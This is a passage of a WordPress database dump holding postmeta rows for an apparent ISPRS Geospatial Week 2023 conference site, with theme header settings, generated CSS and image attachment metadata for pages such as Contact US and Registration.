(9632,2372,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/Egypt2-e1668179241642.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9633,2531,'_dt_fancy_header_layout_heading',''),
(9634,2531,'_dt_fancy_header_title_aligment','center'),
(9635,2531,'_dt_fancy_header_height','300'),
(9636,2531,'_dt_fancy_header_padding-top','0px'),
(9637,2531,'_dt_fancy_header_padding-bottom','0px'),
(9638,2531,'_dt_fancy_header_breadcrumbs_heading',''),
(9639,2531,'_dt_fancy_header_breadcrumbs','disabled'),
(9640,2531,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9641,2531,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9642,2531,'_dt_fancy_header_title_heading',''),
(9643,2531,'_dt_fancy_header_title_mode','custom'),
(9644,2531,'_dt_fancy_header_title','Cheng Wang, Xiamen University, China (WG I/8)'),
(9645,2531,'_dt_fancy_header_title_font_size','30'),
(9646,2531,'_dt_fancy_header_title_line_height','36'),
(9647,2531,'_dt_fancy_header_text_transform','none'),
(9648,2531,'_dt_fancy_header_title_color_mode','color'),
(9649,2531,'_dt_fancy_header_title_color','#ffffff'),
(9650,2531,'_dt_fancy_header_subtitle_heading',''),
(9651,2531,'_dt_fancy_header_subtitle',''),
(9652,2531,'_dt_fancy_header_subtitle_font_size','18'),
(9653,2531,'_dt_fancy_header_subtitle_line_height','26'),
(9654,2531,'_dt_fancy_header_subtitle_text_transform','none'),
(9655,2531,'_dt_fancy_header_subtitle_color_mode','color'),
(9656,2531,'_dt_fancy_header_subtitle_color','#ffffff'),
(9657,2531,'_dt_fancy_header_bg_heading',''),
(9658,2531,'_dt_fancy_header_bg_color','#222222'),
(9659,2531,'_dt_fancy_header_bg_image_origin','custom'),
(9660,2531,'_dt_fancy_header_bg_image','a:0:{}'),
(9661,2531,'_dt_fancy_header_bg_repeat','no-repeat'),
(9662,2531,'_dt_fancy_header_bg_position_x','center'),
(9663,2531,'_dt_fancy_header_bg_position_y','center'),
(9664,2531,'_dt_fancy_header_bg_fullscreen','1'),
(9665,2531,'_dt_fancy_header_bg_overlay','0'),
(9666,2531,'_dt_fancy_header_overlay_color','#000'),
(9667,2531,'_dt_fancy_header_bg_overlay_opacity','50'),
(9668,2531,'_dt_fancy_header_scroll_effect','default'),
(9669,2531,'_dt_fancy_header_bg_parallax','0.5'),
(9670,2531,'_dt_fancy_header_responsiveness_heading',''),
(9671,2531,'_dt_fancy_header_responsiveness','enabled'),
(9672,2531,'_dt_fancy_header_responsiveness_switch','778px'),
(9673,2531,'_dt_fancy_header_responsive_height','70'),
(9674,2531,'_dt_fancy_header_responsive_font_size','30'),
(9675,2531,'_dt_fancy_header_responsive_title_line_height','38'),
(9676,2531,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9677,2531,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9678,2531,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(9679,2531,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9680,2622,'_wpb_shortcodes_custom_css','.vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1665134722899{padding-bottom: 30px !important;}.vc_custom_1665135195655{padding-bottom: 20px !important;}.vc_custom_1665135234836{padding-bottom: 20px !important;}'),
(9681,53,'_dt_fancy_header_layout_heading',''),
(9682,53,'_dt_fancy_header_title_aligment','center'),
(9683,53,'_dt_fancy_header_height','300'),
(9684,53,'_dt_fancy_header_padding-top','0px'),
(9685,53,'_dt_fancy_header_padding-bottom','0px'),
(9686,53,'_dt_fancy_header_breadcrumbs_heading',''),
(9687,53,'_dt_fancy_header_breadcrumbs','disabled'),
(9688,53,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9689,53,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9690,53,'_dt_fancy_header_title_heading',''),
(9691,53,'_dt_fancy_header_title_mode','custom'),
(9692,53,'_dt_fancy_header_title','Contact US'),
(9693,53,'_dt_fancy_header_title_font_size','30'),
(9694,53,'_dt_fancy_header_title_line_height','36'),
(9695,53,'_dt_fancy_header_text_transform','none'),
(9696,53,'_dt_fancy_header_title_color_mode','color'),
(9697,53,'_dt_fancy_header_title_color','#ffffff'),
(9698,53,'_dt_fancy_header_subtitle_heading',''),
(9699,53,'_dt_fancy_header_subtitle',''),
(9700,53,'_dt_fancy_header_subtitle_font_size','18'),
(9701,53,'_dt_fancy_header_subtitle_line_height','26'),
(9702,53,'_dt_fancy_header_subtitle_text_transform','none'),
(9703,53,'_dt_fancy_header_subtitle_color_mode','color'),
(9704,53,'_dt_fancy_header_subtitle_color','#ffffff'),
(9705,53,'_dt_fancy_header_bg_heading',''),
(9706,53,'_dt_fancy_header_bg_color','#222222'),
(9707,53,'_dt_fancy_header_bg_image_origin','custom'),
(9708,53,'_dt_fancy_header_bg_image','a:1:{i:0;i:2288;}'),
(9709,53,'_dt_fancy_header_bg_repeat','no-repeat'),
(9710,53,'_dt_fancy_header_bg_position_x','center'),
(9711,53,'_dt_fancy_header_bg_position_y','center'),
(9712,53,'_dt_fancy_header_bg_fullscreen','1'),
(9713,53,'_dt_fancy_header_bg_overlay','0'),
(9714,53,'_dt_fancy_header_overlay_color','#000'),
(9715,53,'_dt_fancy_header_bg_overlay_opacity','50'),
(9716,53,'_dt_fancy_header_scroll_effect','default'),
(9717,53,'_dt_fancy_header_bg_parallax','0.5'),
(9718,53,'_dt_fancy_header_responsiveness_heading',''),
(9719,53,'_dt_fancy_header_responsiveness','enabled'),
(9720,53,'_dt_fancy_header_responsiveness_switch','778px'),
(9721,53,'_dt_fancy_header_responsive_height','70'),
(9722,53,'_dt_fancy_header_responsive_font_size','30'),
(9723,53,'_dt_fancy_header_responsive_title_line_height','38'),
(9724,53,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9725,53,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9726,53,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(9729,2626,'_wp_attached_file','2022/10/mlogo-82.jpg'),
(9730,2626,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2400;s:6:\"height\";i:277;s:4:\"file\";s:20:\"2022/10/mlogo-82.jpg\";s:8:\"filesize\";i:80839;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"mlogo-82-300x35.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2089;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"mlogo-82-1024x118.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:118;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12349;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"mlogo-82-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3490;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"mlogo-82-768x89.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7659;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"mlogo-82-1536x177.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23277;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:21:\"mlogo-82-2048x236.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:236;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35161;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9731,2627,'_wp_attached_file','2022/10/mlogo-82-1.jpg'),
(9732,2627,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2400;s:6:\"height\";i:277;s:4:\"file\";s:22:\"2022/10/mlogo-82-1.jpg\";s:8:\"filesize\";i:80839;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"mlogo-82-1-300x35.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2089;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"mlogo-82-1-1024x118.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:118;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12349;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"mlogo-82-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3490;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"mlogo-82-1-768x89.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7659;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"mlogo-82-1-1536x177.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23277;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:23:\"mlogo-82-1-2048x236.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:236;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35161;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9733,2628,'_wp_attached_file','2022/10/mlogo-82-2.jpg'),
(9734,2628,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2400;s:6:\"height\";i:277;s:4:\"file\";s:22:\"2022/10/mlogo-82-2.jpg\";s:8:\"filesize\";i:80839;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"mlogo-82-2-300x35.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2089;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"mlogo-82-2-1024x118.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:118;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12349;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"mlogo-82-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3490;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"mlogo-82-2-768x89.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7659;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"mlogo-82-2-1536x177.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23277;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:23:\"mlogo-82-2-2048x236.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:236;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35161;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9736,2631,'_edit_lock','1675589409:1'),
(9737,2631,'_edit_last','1'),
(9738,2082,'_wp_old_date','2022-10-07'),
(9739,2083,'_wp_old_date','2022-10-07'),
(9740,2346,'_wp_old_date','2022-10-07'),
(9741,2348,'_wp_old_date','2022-10-07'),
(9742,2349,'_wp_old_date','2022-10-07'),
(9743,2350,'_wp_old_date','2022-10-07'),
(9744,2351,'_wp_old_date','2022-10-07'),
(9745,2084,'_wp_old_date','2022-10-07'),
(9746,2352,'_wp_old_date','2022-10-07'),
(9747,2281,'_wp_old_date','2022-10-07'),
(9748,2353,'_wp_old_date','2022-10-07'),
(9749,2354,'_wp_old_date','2022-10-07'),
(9750,2355,'_wp_old_date','2022-10-07'),
(9751,2282,'_wp_old_date','2022-10-07'),
(9752,2283,'_wp_old_date','2022-10-07'),
(9753,2284,'_wp_old_date','2022-10-07'),
(9754,2285,'_wp_old_date','2022-10-07'),
(9755,2356,'_wp_old_date','2022-10-07'),
(9756,2357,'_wp_old_date','2022-10-07'),
(9757,2359,'_wp_old_date','2022-10-07'),
(9758,2358,'_wp_old_date','2022-10-07'),
(9759,2286,'_wp_old_date','2022-10-07'),
(9760,2631,'_wp_page_template','default'),
(9798,2631,'_wpb_vc_js_status','true'),
(9799,2631,'_dt_microsite_primary_menu',''),
(9800,2631,'_dt_microsite_split_left_menu',''),
(9801,2631,'_dt_microsite_split_right_menu',''),
(9802,2631,'_dt_microsite_mobile_menu',''),
(9803,2631,'_dt_sidebar_position','disabled'),
(9804,2631,'_dt_sidebar_widgetarea_id','sidebar_1'),
(9805,2631,'_dt_sidebar_hide_on_mobile','0'),
(9806,2631,'_dt_footer_show','1'),
(9807,2631,'_dt_footer_widgetarea_id','sidebar_2'),
(9808,2631,'_dt_footer_hide_on_mobile','0'),
(9809,2631,'_dt_header_title','fancy'),
(9810,2631,'_dt_header_background','normal'),
(9811,2631,'_dt_header_background_below_slideshow','disabled'),
(9812,2631,'_dt_header_transparent_bg_color_scheme','light'),
(9813,2631,'_dt_header_transparent_top_bar_bg_color','#ffffff');
INSERT INTO `dnctiavkr_postmeta` VALUES
(9814,2631,'_dt_header_transparent_top_bar_bg_opacity','25'),
(9815,2631,'_dt_header_transparent_bg_color','#000000'),
(9816,2631,'_dt_header_transparent_bg_opacity','50'),
(9817,2631,'_dt_header_disabled_background','normal'),
(9818,2631,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(9819,2631,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(9820,2631,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(9821,2631,'_dt_header_disabled_transparent_bg_color','#000000'),
(9822,2631,'_dt_header_disabled_transparent_bg_opacity','50'),
(9823,2631,'_dt_page_overrides_top_margin',''),
(9824,2631,'_dt_page_overrides_right_margin',''),
(9825,2631,'_dt_page_overrides_bottom_margin',''),
(9826,2631,'_dt_page_overrides_left_margin',''),
(9827,2631,'_dt_mobile_page_padding_top',''),
(9828,2631,'_dt_mobile_page_padding_right',''),
(9829,2631,'_dt_mobile_page_padding_bottom',''),
(9830,2631,'_dt_mobile_page_padding_left',''),
(9831,2631,'_dt_fancy_header_layout_heading',''),
(9832,2631,'_dt_fancy_header_title_aligment','center'),
(9833,2631,'_dt_fancy_header_height','350'),
(9834,2631,'_dt_fancy_header_padding-top','0px'),
(9835,2631,'_dt_fancy_header_padding-bottom','0px'),
(9836,2631,'_dt_fancy_header_breadcrumbs_heading',''),
(9837,2631,'_dt_fancy_header_breadcrumbs','disabled'),
(9838,2631,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9839,2631,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9840,2631,'_dt_fancy_header_title_heading',''),
(9841,2631,'_dt_fancy_header_title_mode','custom'),
(9842,2631,'_dt_fancy_header_title','The ISPRS Geospatial Week (GSW)'),
(9843,2631,'_dt_fancy_header_title_font_size','60'),
(9844,2631,'_dt_fancy_header_title_line_height','60'),
(9845,2631,'_dt_fancy_header_text_transform','uppercase'),
(9846,2631,'_dt_fancy_header_title_color_mode','color'),
(9847,2631,'_dt_fancy_header_title_color','#ffffff'),
(9848,2631,'_dt_fancy_header_subtitle_heading',''),
(9849,2631,'_dt_fancy_header_subtitle',''),
(9850,2631,'_dt_fancy_header_subtitle_font_size','18'),
(9851,2631,'_dt_fancy_header_subtitle_line_height','26'),
(9852,2631,'_dt_fancy_header_subtitle_text_transform','none'),
(9853,2631,'_dt_fancy_header_subtitle_color_mode','color'),
(9854,2631,'_dt_fancy_header_subtitle_color','#ffffff'),
(9855,2631,'_dt_fancy_header_bg_heading',''),
(9856,2631,'_dt_fancy_header_bg_color','#222222'),
(9857,2631,'_dt_fancy_header_bg_image_origin','featured_image'),
(9858,2631,'_dt_fancy_header_bg_image','a:0:{}'),
(9859,2631,'_dt_fancy_header_bg_repeat','no-repeat'),
(9860,2631,'_dt_fancy_header_bg_position_x','center'),
(9861,2631,'_dt_fancy_header_bg_position_y','center'),
(9862,2631,'_dt_fancy_header_bg_fullscreen','1'),
(9863,2631,'_dt_fancy_header_bg_overlay','0'),
(9864,2631,'_dt_fancy_header_overlay_color','#000'),
(9865,2631,'_dt_fancy_header_bg_overlay_opacity','50'),
(9866,2631,'_dt_fancy_header_scroll_effect','default'),
(9867,2631,'_dt_fancy_header_bg_parallax','0.5'),
(9868,2631,'_dt_fancy_header_responsiveness_heading',''),
(9869,2631,'_dt_fancy_header_responsiveness','enabled'),
(9870,2631,'_dt_fancy_header_responsiveness_switch','778px'),
(9871,2631,'_dt_fancy_header_responsive_height','70'),
(9872,2631,'_dt_fancy_header_responsive_font_size','30'),
(9873,2631,'_dt_fancy_header_responsive_title_line_height','38'),
(9874,2631,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9875,2631,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9876,2631,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(9877,2631,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/pexels-pixabay-71116-scaled.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 350px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 60px;\n  line-height: 60px;\n  color: #ffffff;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9879,2638,'_edit_lock','1675493901:1'),
(9888,2638,'_edit_last','1'),
(9889,2638,'_wpb_vc_js_status','true'),
(9890,2638,'_dt_sidebar_position','disabled'),
(9891,2638,'_dt_sidebar_widgetarea_id','sidebar_1'),
(9892,2638,'_dt_sidebar_hide_on_mobile','0'),
(9893,2638,'_dt_footer_show','1'),
(9894,2638,'_dt_footer_widgetarea_id','sidebar_2'),
(9895,2638,'_dt_footer_hide_on_mobile','0'),
(9896,2638,'_dt_header_title','fancy'),
(9897,2638,'_dt_header_background','normal'),
(9898,2638,'_dt_header_background_below_slideshow','disabled'),
(9899,2638,'_dt_header_transparent_bg_color_scheme','light'),
(9900,2638,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(9901,2638,'_dt_header_transparent_top_bar_bg_opacity','25'),
(9902,2638,'_dt_header_transparent_bg_color','#000000'),
(9903,2638,'_dt_header_transparent_bg_opacity','50'),
(9904,2638,'_dt_header_disabled_background','normal'),
(9905,2638,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(9906,2638,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(9907,2638,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(9908,2638,'_dt_header_disabled_transparent_bg_color','#000000'),
(9909,2638,'_dt_header_disabled_transparent_bg_opacity','50'),
(9910,2638,'_dt_page_overrides_top_margin',''),
(9911,2638,'_dt_page_overrides_right_margin',''),
(9912,2638,'_dt_page_overrides_bottom_margin',''),
(9913,2638,'_dt_page_overrides_left_margin',''),
(9914,2638,'_dt_mobile_page_padding_top',''),
(9915,2638,'_dt_mobile_page_padding_right',''),
(9916,2638,'_dt_mobile_page_padding_bottom',''),
(9917,2638,'_dt_mobile_page_padding_left',''),
(9918,2638,'_dt_fancy_header_layout_heading',''),
(9919,2638,'_dt_fancy_header_title_aligment','center'),
(9920,2638,'_dt_fancy_header_height','350'),
(9921,2638,'_dt_fancy_header_padding-top','0px'),
(9922,2638,'_dt_fancy_header_padding-bottom','0px'),
(9923,2638,'_dt_fancy_header_breadcrumbs_heading',''),
(9924,2638,'_dt_fancy_header_breadcrumbs','disabled'),
(9925,2638,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9926,2638,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9927,2638,'_dt_fancy_header_title_heading',''),
(9928,2638,'_dt_fancy_header_title_mode','custom'),
(9929,2638,'_dt_fancy_header_title','Registration'),
(9930,2638,'_dt_fancy_header_title_font_size','50'),
(9931,2638,'_dt_fancy_header_title_line_height','36'),
(9932,2638,'_dt_fancy_header_text_transform','uppercase'),
(9933,2638,'_dt_fancy_header_title_color_mode','color'),
(9934,2638,'_dt_fancy_header_title_color','#1e73be'),
(9935,2638,'_dt_fancy_header_subtitle_heading',''),
(9936,2638,'_dt_fancy_header_subtitle',''),
(9937,2638,'_dt_fancy_header_subtitle_font_size','18'),
(9938,2638,'_dt_fancy_header_subtitle_line_height','26'),
(9939,2638,'_dt_fancy_header_subtitle_text_transform','none'),
(9940,2638,'_dt_fancy_header_subtitle_color_mode','color'),
(9941,2638,'_dt_fancy_header_subtitle_color','#ffffff'),
(9942,2638,'_dt_fancy_header_bg_heading',''),
(9943,2638,'_dt_fancy_header_bg_color','#222222'),
(9944,2638,'_dt_fancy_header_bg_image_origin','featured_image'),
(9945,2638,'_dt_fancy_header_bg_image','a:0:{}'),
(9946,2638,'_dt_fancy_header_bg_repeat','no-repeat'),
(9947,2638,'_dt_fancy_header_bg_position_x','center'),
(9948,2638,'_dt_fancy_header_bg_position_y','center'),
(9949,2638,'_dt_fancy_header_bg_fullscreen','1'),
(9950,2638,'_dt_fancy_header_bg_overlay','0'),
(9951,2638,'_dt_fancy_header_overlay_color','#000'),
(9952,2638,'_dt_fancy_header_bg_overlay_opacity','50'),
(9953,2638,'_dt_fancy_header_scroll_effect','default'),
(9954,2638,'_dt_fancy_header_bg_parallax','0.5'),
(9955,2638,'_dt_fancy_header_responsiveness_heading',''),
(9956,2638,'_dt_fancy_header_responsiveness','enabled'),
(9957,2638,'_dt_fancy_header_responsiveness_switch','778px'),
(9958,2638,'_dt_fancy_header_responsive_height','70'),
(9959,2638,'_dt_fancy_header_responsive_font_size','30'),
(9960,2638,'_dt_fancy_header_responsive_title_line_height','38'),
(9961,2638,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9962,2638,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9963,2638,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
